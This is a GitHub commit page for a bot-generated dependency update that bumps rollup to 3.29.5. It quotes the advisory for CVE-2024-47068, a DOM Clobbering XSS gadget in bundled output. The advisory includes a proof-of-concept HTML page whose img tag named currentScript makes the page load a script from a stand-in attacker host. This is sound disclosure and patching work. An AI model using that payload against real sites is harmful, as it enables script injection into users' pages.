Skip to content

Commit

Permalink
chore(deps): update dependency rollup to v3.29.5 [security] (#7934)
Browse files Browse the repository at this point in the history
This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [rollup](https://rollupjs.org/)
([source](https://redirect.github.com/rollup/rollup)) | [`3.29.4` ->
`3.29.5`](https://renovatebot.com/diffs/npm/rollup/3.29.4/3.29.5) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/rollup/3.29.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/rollup/3.29.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/rollup/3.29.4/3.29.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/rollup/3.29.4/3.29.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2024-47068](https://redirect.github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm)

### Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling
scripts that use `import.meta.url` or with plugins that emit and
reference asset files from code in `cjs`/`umd`/`iife` format. The DOM
Clobbering gadget can lead to cross-site scripting (XSS) in web pages
where scriptless attacker-controlled HTML elements (e.g., an `img` tag
with an unsanitized `name` attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular
bundlers like Webpack
([CVE-2024-43788](https://redirect.github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)),
which might serve as a good reference.

### Details

#### Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first
embeds a piece of non-script, seemingly benign HTML markups in the
webpage (e.g. through a post or comment) and leverages the gadgets
(pieces of js code) living in the existing javascript code to transform
it into executable code. More for information about DOM Clobbering, here
are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

#### Gadget found in `rollup`

We have identified a DOM Clobbering vulnerability in `rollup` bundled
scripts, particularly when the scripts uses `import.meta` and set output
in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta
property with the URL retrieved from `document.currentScript`.


https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162


https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

However, this implementation is vulnerable to a DOM Clobbering attack.
The `document.currentScript` lookup can be shadowed by an attacker via
the browser's named DOM tree element access mechanism. This manipulation
allows an attacker to replace the intended script element with a
malicious HTML element. When this happens, the `src` attribute of the
attacker-controlled element (e.g., an `img` tag ) is used as the URL for
importing scripts, potentially leading to the dynamic loading of scripts
from an attacker-controlled server.

### PoC

Considering a website that contains the following `main.js` script, the
devloper decides to use the `rollup` to bundle up the program: `rollup
main.js --format cjs --file bundle.js`.

```
var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)
```

The output `bundle.js` is shown in the following code snippet.

```
'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);
```

Adding the `rollup` bundled script, `bundle.js`, as part of the web page
source code, the page could load the `extra.js` file from the attacker's
domain, `attacker.controlled.server` due to the introduced gadget during
bundling. The attacker only needs to insert an `img` tag with the name
attribute set to `currentScript`. This can be done through a website's
feature that allows users to embed certain script-less HTML (e.g.,
markdown renderers, web email clients, forums) or via an HTML injection
vulnerability in third-party JavaScript loaded on the page.

```
<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>
```

### Impact

This vulnerability can result in cross-site scripting (XSS) attacks on
websites that include rollup-bundled files (configured with an output
format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users
to inject certain scriptless HTML tags without properly sanitizing the
`name` or `id` attributes.

### Patch

Patching the following two functions with type checking would be
effective mitigations against DOM Clobbering attack.

```
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);
```

```
const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;
```

---

### Release Notes

<details>
<summary>rollup/rollup (rollup)</summary>

###
[`v3.29.5`](https://redirect.github.com/rollup/rollup/compare/v3.29.4...dfd233d3a9feb18aa69b49b6c1da0248a4f1c6e3)

[Compare
Source](https://redirect.github.com/rollup/rollup/compare/v3.29.4...v3.29.5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" in timezone America/Los_Angeles,
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/apollographql/apollo-server).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC45Ny4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiOmNocmlzdG1hc190cmVlOiBkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
  • Loading branch information
renovate[bot] authored Sep 27, 2024
1 parent f5f23a6 commit ae16ccd
Show file tree
Hide file tree
Showing 4 changed files with 19 additions and 17 deletions.
23 changes: 12 additions & 11 deletions package-lock.json

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

2 changes: 1 addition & 1 deletion package.json
Original file line number Diff line number Diff line change
Expand Up @@ -95,7 +95,7 @@
"prettier-2": "npm:[email protected]",
"qs-middleware": "1.0.3",
"requisition": "1.7.0",
"rollup": "3.29.4",
"rollup": "3.29.5",
"supertest": "6.3.4",
"test-listen": "1.1.0",
"ts-jest": "29.2.3",
Expand Down
9 changes: 5 additions & 4 deletions smoke-test/package-lock.json

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

2 changes: 1 addition & 1 deletion smoke-test/package.json
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@
"@rollup/plugin-json": "6.1.0",
"@rollup/plugin-node-resolve": "15.2.3",
"@types/make-fetch-happen": "10.0.4",
"rollup": "3.29.4"
"rollup": "3.29.5"
},
"volta": {
"extends": "../package.json"
Expand Down

0 comments on commit ae16ccd

Please sign in to comment.